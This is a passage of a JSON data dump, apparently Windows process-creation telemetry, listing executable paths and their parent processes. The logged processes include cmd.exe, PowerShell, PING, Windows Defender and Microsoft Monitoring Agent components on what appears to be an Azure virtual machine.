\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90875AAA-9256-468E-A6B3-041D325C6594\\\\MpSigStub.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WMIADAP.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\",\"C:\\\\Windows\\\\System32\\\\MpSigStub.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring 